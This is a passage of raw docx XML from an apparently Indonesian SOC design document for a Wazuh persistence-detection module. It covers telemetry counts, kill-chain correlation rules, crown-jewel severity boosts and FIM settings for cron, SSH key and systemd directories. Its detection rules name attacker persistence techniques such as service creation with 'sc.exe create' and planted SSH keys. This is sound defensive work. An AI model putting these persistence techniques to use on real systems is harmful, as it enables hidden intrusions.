        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Memicu evaluasi integritas terhadap konfigurasi unit file baru sebelum layanan di-start.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Rasional Penyelamatan Sistem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Layanan sistem operasi adalah tempat bersembunyi paling berbahaya bagi ancaman tingkat lanjut (APT). Begitu backdoor terdaftar sebagai systemd service atau Windows service:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Program akan otomatis berjalan saat komputer pertama kali booting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Jika proses dimatikan oleh analis (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>taskkill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), sistem operasi akan otomatis merestart proses tersebut (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>auto-restart policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Program memiliki wewenang penuh untuk memanipulasi hardware, jaringan, dan memori.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 100203 menutup celah ini dengan mengawasi direktori </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan eksekusi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc.exe create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, memberikan sinyal darurat Level 9 kepada analis SOC saat layanan baru didaftarkan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BAGIAN 3: MATRIKS DISTRIBUSI EMPIRIS TELEMETRI PERSISTENCE (JULI 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dalam dataset sensus telemetri bulan Juli 2026 (840.402 alert), kategori persistensi dan perubahan integritas sistem memiliki jejak empiris yang terukur:</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Interaksi dengan Modul `030-persistence`</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2904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Dpkg half configured (Debian state)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L7</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1.774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0,21%</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(Unattended update)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Audit status paket instalasi persisten</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40704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Systemd: Service exited due to error</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1.385</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0,16%</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(Transient restart)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Monitoring kegagalan restart unit service</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2902</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New dpkg package installed</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L7</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1.179</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0,14%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(Update OS sah)</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Baseline integrasi paket software baru</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550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Integrity checksum changed (FIM)</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L7</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1.428</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0,17%</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(Routine file edit)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Sensor pemicu modifikasi cron / SSH key</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554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File added to the system (FIM)</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417</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(File baru)</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Sensor pemicu penambahan unit file service baru</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5402</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Successful sudo to ROOT executed</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L3</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364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(Admin Sah)</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Pengecekan eskalasi sebelum instalasi persistensi</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Endpoint</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Custom Autostart &amp; Cron Monitors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L8-L9</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Live Sensor</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Active Defense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True Positive Focused</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100200 s.d. 100203 (Persistence Layer)</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4: INTEGRASI PIPELINE KORELASI HILIR &amp; CROWN JEWELS ELEVATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Modul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>030-persistence.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> memiliki peran arsitektural yang sangat krusial dalam skenario korelasi rantai serangan pada file [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>070-correlation.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>](file:///c:/Users/Pongo/Downloads/wazuh%20alert%20grouping%20-/ruleset/rules/070-correlation.xml) dan pembobotan aset kritis pada [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>090-critical-assets.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>](file:///c:/Users/Pongo/Downloads/wazuh%20alert%20grouping%20-/ruleset/rules/090-critical-assets.xml):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REKONSTRUKSI RANTAI SERANGAN LENGKAP (FULL CYBER KILL CHAIN)                       │</w:t>
              <w:br/>
              <w:t>└─────────────────────────────────────────────────────────────────────────────────────────────────┘</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  FASE 1: Kompromi Akun                    FASE 2: Eskalasi Wewenang</w:t>
              <w:br/>
              <w:t xml:space="preserve"> ┌───────────────────────────────┐        ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ CORR-001 (Rule 107000)        │        │ CORR-002 (Rule 107001)        │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Brute Force -&gt; Login Sukses   │ ─────&gt; │ Akun Terkompromi Menjalankan  │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Status: P1 HIGH PRIORITY      │        │ Sudo ROOT (Rule 100030)       │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> └───────────────────────────────┘        └───────────────────────────────┘</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                         │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                         ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">  FASE 3: Penanaman Pintu Belakang          FASE 4: Full Intrusion Chain Escalation</w:t>
              <w:br/>
              <w:t xml:space="preserve"> ┌───────────────────────────────┐        ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Modul 030-persistence         │        │ CORR-003 (Rule 107002)        │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Rule 100200 (Cronjob)         │ ─────&gt; │ LEVEL 14 (PRIORITY P0 CRITICAL│</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Rule 100201 (SSH Key)         │        │ Target SLA Penanganan &lt; 15 m  │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Rule 100203 (Systemd Service) │        │ "Compromise -&gt; PrivEsc -&gt;     │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> └───────────────────────────────┘        │  Persistence Established"     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          └───────────────────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Rekonstruksi Full Kill Chain (Rule 107002 — Level 14 / Prioritas P0):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Dalam arsitektur deteksi, kemunculan rule di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>030-persistence.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> secara mandiri berbobot Level 8/9. Namun, jika kemunculan ini </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>didahului oleh pembobolan akun (CORR-001) dan eskalasi sudo (CORR-002) dalam jendela waktu 20 menit (1.200 detik)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada agen yang sama, engine korelasi langsung memicu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rule 107002</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id="107002" level="14" frequency="1" timeframe="1200"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;persistence&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_matched_sid&gt;107001&lt;/if_matched_sid&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;same_agent /&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;ATTACK-CHAIN: Full Intrusion Chain: Compromise -&gt; PrivEsc -&gt; Persistence&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;attack_chain,full_kill_chain,priority_p0,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t>&lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ini membuktikan penyerang telah menyelesaikan seluruh siklus intrusi, dan insiden otomatis dinaikkan ke tingkat darurat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Prioritas P0 (SLA Penanganan &lt; 15 Menit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Elevasi Aset Kritis Crown Jewels (`090-critical-assets.xml`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Jika salah satu rule persistensi (grup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) terdeteksi pada server yang terdaftar di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>etc/lists/critical-assets-list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Domain Controller atau Database Utama), Rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>109001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> langsung melipatgandakan tingkat keparahan menjadi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 14</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id="109001" level="14"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;persistence,malware&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;list field="dstip" lookup="address_match_key"&gt;etc/lists/critical-assets-list&lt;/list&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;CRITICAL-ASSET: High severity persistence or malware detected on Crown Jewel&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;critical_assets,priority_p0,severity_boost,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t>&lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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Konfigurasi Pemantauan File Integrity Monitoring (FIM / Syscheck):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Untuk menjamin kecepatan deteksi Rule 100200 dan 100201, file konfigurasi agen Wazuh (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) wajib mengaktifkan opsi pemantauan real-time (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>realtime="yes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) pada path kritis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> `&lt;directories realtime="yes"&gt;/etc/cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,/var/spool/cron&lt;/directories&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> `&lt;directories realtime="yes"&gt;/root/.ssh,/home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/.ssh&lt;/directories&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;directories realtime="yes"&gt;/etc/systemd/system&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Prosedur Pemeliharaan Resmi (Change Management Window):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Aktivitas administrator yang sah saat memperbarui cronjob atau menambahkan service baru wajib dilakukan pada jendela waktu pemeliharaan resmi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Maintenance Window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) yang terdaftar pada CDB List </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>approved-maintenance-windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Hal ini memberikan pengurangan skor otomatis (-25 poin) sehingga tidak memicu false alarm pada operasional rutin.</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GRC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Setiap penambahan direktori persistensi baru (misalnya jika memantau task scheduler macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>launchd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> di Rule 100204) wajib didokumentasikan dan dicatat pada log audit tata kelola di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>095-governance-log.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</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ruleset/rules/030-persistence.xml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File Ruleset Korelasi Hilir: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File Ruleset Aset Kritis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ruleset/rules/090-critical-assets.xml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FP_TP/2904.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40704.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>550.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>554.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5402.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Berkas Spesifikasi Arsitektur: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/ARCHITECTURE.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan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